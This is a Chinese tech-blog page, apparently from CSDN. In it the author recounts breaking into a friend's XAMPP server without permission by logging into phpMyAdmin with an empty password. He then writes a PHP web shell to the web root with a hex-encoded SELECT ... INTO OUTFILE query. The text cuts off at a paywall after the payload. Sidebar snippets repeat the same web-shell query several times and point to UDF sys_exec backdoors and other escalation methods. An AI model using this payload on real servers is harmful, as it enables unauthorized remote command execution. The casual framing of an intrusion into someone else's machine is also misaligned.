mysql后门_Mysql提权留后门

最新推荐文章于 2025-03-13 06:58:28 发布
最新推荐文章于 2025-03-13 06:58:28 发布
阅读量551 收藏
点赞数
文章标签: mysql后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_33303537/article/details/113162818
版权
本文记录了一次针对MySQL服务器的提权攻击过程,包括通过PHPMyAdmin留后门和执行系统命令。同时,文章提供了MAC环境下XAMPP的安全配置建议,如限制远程登录、关闭HTTP访问权限、修改MySQL密码以及调整文件写入权限等,以防止类似攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

记录一次关于无聊时对基友MYSQL服务器的提权攻击。

尽管没有完全攻击到对方,并且没有清理痕迹,但是,这里写写简单的防御方式。

0x01.从无聊的nmap扫描开始

今晚无聊时候,本想打开电脑扫下谁连进我wifi,无意间,眼睛一亮看到了一个惊喜。

2014-12-27-hack-mysql-1.png

看到80端口,就有种冲动想要进去,进去后发现forbidden,然后试了试 phpmyadmin,发现直接进去,因为基友用的XAMPP集成环境,一下就猜到空密码。

2014-12-27-hack-mysql-2.png

登进去后,就想办法留个后门,搞个木马。注意一下,mysql是以管理员权限运行的,so...

查了下资料,这个很简单,网上很多。

找个一个表进去,用下面那句话,就搞定了。

SELECT 0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E FROM user into outfile '/Applications/XAMPP/xamppfiles/phpmyadmin/fuck.php'

那一串字符就是 <?php system($_REQUEST[cmd]);?> 的十六进制编码了,

最低0.47元/天 解锁文章
Wang Eric
关注
(三)phpstudy下开启mysql,运用phpmyadmin管理执行sql语句,写入一句话后门getshell。
爱上卿的博客
01-15 3804
学习mysql数据库漏洞整理过程中,想复现phpmyadmin写入一句话后门getshell的过程遇到很多问题。phpmyadmin是很多网站用来管理数据库的一个系统,尤其是mysql数据库管理的较多。phpmyadmin实现mysql数据库的管理,采用phpstudy实现较为方便。过程出现较多障碍,一步步走向成功,记录。 1 启动phpstudy,出现mysql无法启动的问题 因为之前已经装...
mysql 权_Mysql权留后门
weixin_33532301的博客
01-18 226
记录一次关于无聊时对基友MYSQL服务器的权攻击。尽管没有完全攻击到对方,并且没有清理痕迹,但是,这里写写简单的防御方式。0x01.从无聊的nmap扫描开始今晚无聊时候,本想打开电脑扫下谁连进我wifi,无意间,眼睛一亮看到了一个惊喜。看到80端口,就有种冲动想要进去,进去后发现forbidden,然后试了试 phpmyadmin,发现直接进去,因为基友用的XAMPP集成环境,一下就猜到空密码。...
【2025最新】phpMyAdmin渗透利用全链路:信息收集→漏洞探测→后渗透权技巧
最新发布
浩策盾悟
03-13 8932
phpinfo()/tmp/root得知 通过日志我们就可以进行其它渗透行为。
mysql权软件后门_Mysql权留后门
weixin_42411799的博客
01-21 132
记录一次关于无聊时对基友MYSQL服务器的权攻击。尽管没有完全攻击到对方,并且没有清理痕迹,但是,这里写写简单的防御方式。0x01.从无聊的nmap扫描开始今晚无聊时候,本想打开电脑扫下谁连进我wifi,无意间,眼睛一亮看到了一个惊喜。 看到80端口,就有种冲动想要进去,进去后发现forbidden,然后试了试 phpmyadmin,发现直接进去,因为基友用的XAMPP集成环境,一下就猜到空密码...
mysql会有后门吗_mysql后门
weixin_36238982的博客
01-27 209
Backdoors for Mysql by Vicente Díaz (vdiaz@edge-security.com)This document explores the possibility of creating backdoors for the last version of Mysql (5.1) using thesame techniques present in other ...
mysql后门
0ffs3t
02-07 800
Backdoors for Mysql by Vicente Díaz (vdiaz@edge-security.com) This document explores the possibility of creating backdoors for the last version of Mysql (5.1) using the same techniques present i
Windows权—数据库权-mysql权&mssql权&Oracle数据库
网络空间安全学习
04-01 1506
Windows权-数据库权-MySQL权-MSSQL权-OracleMySQL UDF权、反弹shell、启动项、mof权 MSSQL系统函数-使用系统函数权 Oracle 数据库权 可使用Oracle shell工具进行操作
MySQL UDF
small_cat's home
10-22 2048
UDF 全称 User Defind Function(用户自定义函数),用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用,就像调用本机函数 version () 一样方便。UDF 权是通过这样的方法来实现获取对方主机的system的shell权限,从而达到权的目的。要实现 UDF 权需要有一个动态链接库文件。
权)mysql权--udf、mof、启动项
yang1234567898的博客
01-05 1263
1、udf权 当获取到mysql的root权限,需要进行权限升,可以尝试使用udf权 首先需要查看mysql是否有导入导出功能,如果secure_file_priv为null,则无法使用udf权,如果value值为空,则可以继续尝试 show variables like 'secure_file_priv'; secure_file_priv的value为null ,不允许导入导出 secure_file_priv的value为/dir/,只允许dir目录下导入导.
navicat_mysql_cs_x64.zip
12-27
值得注意的是,使用未经授权的软件可能存在法律风险,并且可能会有安全问题,如含有恶意软件或后门。因此,尽管这个版本安装简单、免费,但为了数据安全和遵循版权法,建议用户还是通过官方渠道获取并购买正版授权。...
mysql 数据库留后门,运用Mysql语句生成后门木马的具体方法
weixin_35460054的博客
03-17 915
通过Mysql 的语句生成后门木马的方法:SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3Efrom vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'通过Mys...
mysql数据库后门_Mysql5 数据库的后门代码!(经测试,灰常好用)
weixin_35664484的博客
01-19 302
DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;DROP FUNCTION IF EXISTS sys_get;DROP FUNCTION IF EXISTS sys_set;DROP FUNCTION IF EXISTS sys_exec;DROP FUNCTION IF EXISTS sys_eval;CREATE FUNCTION lib_mysq...
mysql会有后门吗_mysql的语句也能生成后门木马
weixin_31787977的博客
02-01 166
SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php';通过Mysql 的注入或者在 phpmyadm...
mysql后门_运用Mysql语句生成后门具体办法
weixin_29195137的博客
01-18 294
软件安装:装机软件必备包随着网络的普及,我们的生活越来越方便,但是网络安全也成了很多人面临的一个问题。特别是那些有着商业数据的企业电脑,更要注意上网安全常识,不然病毒会对我们造成严重的威胁。通过MySQL(和PHP搭配之最佳组合) 的语句生成后门木马的方法:SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797...
Mysql5 数据库的后门代码!(经测试,灰常好用)
weixin_34259232的博客
04-23 181
DROP FUNCTION IF EXISTS lib_mysqludf_sys_info; DROP FUNCTION IF EXISTS sys_get; DROP FUNCTION IF EXISTS...
mysql会有后门吗_MySQL 语句来生成后门木马的实际操作方案
weixin_35907524的博客
02-02 156
此文章主要向大家描述的是正确通过MySQL 语句来生成后门木马的实际操作方法,以下就是通过MySQL 语句来生成后门木马的实际操作方法具体方案的描述,希望在你今后的学习中会有所帮助。通过MySQL语句生成后门木马的方法!SELECT*FROM`vbb_strikes`WHERE1unionselect2,3,0x3C3F7068702073797374656D28245F52455...
mysql定时木马_Mysql的语句生成后门木马的方法
weixin_39926639的博客
01-18 129
咳咳,大家看看就好了,本人不负责所产生的后果复制代码 代码如下:SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/...
通过Mysql 的语句生成后门木马的方法!
03-26 1430
通过Mysql 的语句生成后门木马的方法!SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile c:/inetpub/wwwroot/cmd.php
mysql amd.dll 后门_DLL后门清除完全篇
weixin_39626237的博客
01-19 218
作者:dahubaobao [Nuke Group]主页:http://www.ringz.org团体站点:http://www.digitalnuke.com/main/邮件:dahushibaobao@vip.sina.comQQ:47809945工具及图片这里有下载 http://dahubaobao.go.nease.net/DLL.rar ,解压密码:www.ringz.org后门!相信...
MySQL免杀UDF权技术教程与工具分享
- MYSQL_UDF 5.0:这个文件可能是恶意UDF函数的源代码包,或者包含特定于MySQL 5.0版本的权工具。 综上所述,MySQL的UDF权是一种针对数据库服务的安全威胁,它允许攻击者利用数据库中UDF的漏洞来升权限,从而...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值